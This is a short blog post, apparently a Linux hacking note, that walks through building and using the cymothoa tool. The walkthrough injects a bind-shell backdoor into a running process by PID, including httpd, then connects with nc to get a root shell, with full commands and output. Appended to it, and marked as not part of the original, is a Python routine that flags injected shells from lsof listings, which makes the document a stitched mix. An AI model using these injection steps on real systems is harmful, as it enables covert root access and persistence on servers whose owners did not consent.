z0nek

Download: https://sourceforge.net/projects/cymothoa/files/
Test environment:
It compiles successfully on 32-bit:
[root@localhost cymothoa-1-alpha]# uname -a
Linux localhost.localdomain 2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:35 EDT 2010 i686 i686 i386 GNU/Linux
On 64-bit the build fails with errors.
The backdoor can be injected into any process you have permission over, and the shell you get back runs with that process's privileges. Naturally, once the process restarts or dies, the backdoor is gone with it.

[root@localhost cymothoa-1-alpha]# make
cc cymothoa.c -o cymothoa -Dlinux_x86
[root@localhost cymothoa-1-alpha]# ./cymothoa -p 3055 -s 0 -y 4444    // 3055 is the PID of the process to inject into
[+] attaching to process 3055
register info:
-----------------------------------------------------------
eax value: 0xfffffffc ebx value: 0x9c44400
esp value: 0xbf9fc434 eip value: 0x51c402
------------------------------------------------------------
[+] new esp: 0xbf9fc430
[+] injecting code into 0x008c1000
[+] copy general purpose registers
[+] detaching from 3055
[+] infected!!!

For example, inject into the httpd process and then connect with nc:

[root@localhost mafix]# netstat -ano | grep 8888
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN off (0.00/0/0)
[root@localhost mafix]# lsof -i:8888
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sh 15575 root 0u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 1u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 2u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 10u IPv4 55603 TCP *:ddi-tcp-1 (LISTEN)
sh 15575 root 11u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
[root@localhost mafix]# ps axu | grep 15575 | grep -v grep
root 15575 0.0 0.0 2556 984 ? S 21:59 0:00 /bin//sh
root@kali-vincent:~# nc -vv 172.16.100.156 8888
172.16.100.156: inverse host lookup failed: Unknown host
(UNKNOWN) [172.16.100.156] 8888 (?) open
whoami
root
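A defender-side check, added here as an example and not part of the original post: it parses an `lsof -i` listing modelled on the one above and flags any process whose stdin, stdout and stderr are all sockets, or any shell that owns a listening socket, which is exactly the footprint the injected `sh` leaves behind. The sample listing and its benign `httpd` control row are constructed.

```python
import re
from collections import defaultdict

# Constructed sample modelled on the `lsof -i:8888` listing in the post: a `sh`
# whose fds 0, 1 and 2 are the same TCP connection and that also owns the
# listening socket (fd 10); the httpd row is a benign control.
SAMPLE_LSOF = """\
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sh 15575 root 0u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 1u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 2u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
sh 15575 root 10u IPv4 55603 TCP *:ddi-tcp-1 (LISTEN)
sh 15575 root 11u IPv4 55604 TCP 172.16.100.156:ddi-tcp-1->172.16.100.128:48696 (ESTABLISHED)
httpd 3055 root 4u IPv4 12345 TCP *:http (LISTEN)
"""

SHELLS = {"sh", "bash", "dash", "zsh"}
STDIO = {"0", "1", "2"}

def parse_lsof(text):
    """Group `lsof -i` rows by PID: {pid: {"command": name, "fds": {fd: state}}}."""
    procs = defaultdict(lambda: {"command": None, "fds": {}})
    for line in text.splitlines()[1:]:                 # skip the header row
        parts = line.split()
        if len(parts) < 5 or not parts[1].isdigit():
            continue
        cmd, pid = parts[0], int(parts[1])
        fd = re.sub(r"[rwu]$", "", parts[3])            # "0u" -> "0"
        state = parts[-1].strip("()") if parts[-1].startswith("(") else ""
        procs[pid]["command"] = cmd
        procs[pid]["fds"][fd] = state
    return dict(procs)

def suspicious_processes(procs):
    """Return {pid: [reasons]} for processes that look like an injected shell."""
    findings = {}
    for pid, info in procs.items():
        reasons = []
        if STDIO.issubset(info["fds"]):                # every lsof -i row is a socket
            reasons.append("stdin/stdout/stderr are sockets")
        if info["command"] in SHELLS and "LISTEN" in info["fds"].values():
            reasons.append("shell owns a listening socket")
        if reasons:
            findings[pid] = reasons
    return findings
```

The same stdio test can be run live on a Linux host by checking whether /proc/PID/fd/0, 1 and 2 all link to `socket:[...]` entries.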


Tags: backdoor

© z0nek | Powered by LOFTER